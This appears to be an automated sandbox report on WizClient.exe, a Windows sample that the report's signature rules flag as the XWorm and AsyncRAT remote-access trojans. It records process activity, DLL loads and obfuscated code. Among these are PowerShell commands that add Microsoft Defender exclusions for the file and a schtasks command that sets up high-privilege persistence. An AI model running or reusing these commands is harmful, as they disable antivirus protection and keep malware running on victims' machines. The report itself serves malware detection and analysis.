Source: C:\Users\user\Desktop\WizClient.exe | Code function: 3_2_00007FF7C7C612C8
Source: C:\Users\user\Desktop\WizClient.exe | Code function: 3_2_00007FF7C7C685A1
Source: C:\Users\user\AppData\Local\WizClient.exe | Code function: 17_2_00007FF7C7C612C8
Source: C:\Users\user\AppData\Local\WizClient.exe | Code function: 20_2_00007FF7C7C612C8
Source: C:\Users\user\AppData\Local\WizClient.exe | Code function: 21_2_00007FF7C7C712CC
Source: C:\Users\user\AppData\Local\WizClient.exe | Code function: 24_2_00007FF7C7C612C8
Source: WizClient.exe, 00000011.00000002.1894801680.000000000063C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs WizClient.exe
Source: WizClient.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: WizClient.exe, type: SAMPLE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: WizClient.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: WizClient.exe, MNnxWzFHJ2Ct5plUS0TNIf6CaXhblonCfU6C8N8NjeADq3IH21Ggp5wQZS.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: WizClient.exe, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: WizClient.exe, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: WizClient.exe.3.dr, MNnxWzFHJ2Ct5plUS0TNIf6CaXhblonCfU6C8N8NjeADq3IH21Ggp5wQZS.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: WizClient.exe.3.dr, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: WizClient.exe.3.dr, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: WizClient.exe, RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.cs | Base64 encoded string: 'OWQ7Md1p4cFUvNP5mNCLTLsEzhZ3pyhxj9V135KsRqx+frmKHn5aiEQva6l5LbWB'
Source: WizClient.exe.3.dr, RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.cs | Base64 encoded string: 'OWQ7Md1p4cFUvNP5mNCLTLsEzhZ3pyhxj9V135KsRqx+frmKHn5aiEQva6l5LbWB'
Source: WizClient.exe, shmYJX63MoDoDf0kg7JYt6GmNt.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: WizClient.exe, shmYJX63MoDoDf0kg7JYt6GmNt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: WizClient.exe.3.dr, shmYJX63MoDoDf0kg7JYt6GmNt.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: WizClient.exe.3.dr, shmYJX63MoDoDf0kg7JYt6GmNt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@17/17@4/4
Source: C:\Users\user\Desktop\WizClient.exe | File created: C:\Users\user\AppData\Local\WizClient.exe
Source: C:\Users\user\AppData\Local\WizClient.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8880:120:WilError_03
Source: C:\Users\user\Desktop\WizClient.exe | Mutant created: \Sessions\1\BaseNamedObjects\mRO7rAhCPkjSQfd4
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9120:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8428:120:WilError_03
Source: C:\Users\user\Desktop\WizClient.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: WizClient.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WizClient.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\WizClient.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\WizClient.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WizClient.exe | Virustotal: Detection: 69%
Source: WizClient.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\WizClient.exe | File read: C:\Users\user\Desktop\WizClient.exe
Source: unknown | Process created: C:\Users\user\Desktop\WizClient.exe "C:\Users\user\Desktop\WizClient.exe"
Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\WizClient.exe C:\Users\user\AppData\Local\WizClient.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\WizClient.exe "C:\Users\user\AppData\Local\WizClient.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\WizClient.exe "C:\Users\user\AppData\Local\WizClient.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\WizClient.exe C:\Users\user\AppData\Local\WizClient.exe
Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'
Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizClient.exe'
Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe'
Source: C:\Users\user\Desktop\WizClient.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe"
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\WizClient.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\WizClient.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\WizClient.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\WizClient.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\WizClient.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\WizClient.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
            Source: WizClient.lnk.3.dr LNK file: ..\..\..\..\..\..\Local\WizClient.exe
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\WizClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: WizClient.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: WizClient.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.Coad1DPY7sC43KcTvVUnAO2DgTLNFv466qKrBHXC91eN9FaVUn2WoCKrZLKhclxSmjDguh5VL2r2RHyqglIa,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.L2I7pzHjRmoBi4cye3gJurmEISx4QfhquyCws2IOL2hg4h11WpeiwPch5bh0gtrdVDlR2KD32o5kaCgZm6m2,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.Wvvy1iYMneGe9YwQ784MfLZ4bxZCi2EU0gmKZK4bBPwplkz55RtAZHWy0x5j5XucR4erAve6p4IEp8QG0XeU,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.MjTFhsuWA4H4N5aXgTdwIC3PL0Y4JtKKnyctsnDwtrZdBhvr8akxbu6PLaMEQwwB2b3q0zca6KtDSIyC4Vu5,SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.E8wnMQHnQIkZsPr01twEFbqglnlPeggTA2VQNUZd8z2fkqKzxa07NembiK()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{geWIIr7x7GJsduXCoae9cccbwJ[2],SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.s4ks59xP6h8SUYQivT(Convert.FromBase64String(geWIIr7x7GJsduXCoae9cccbwJ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
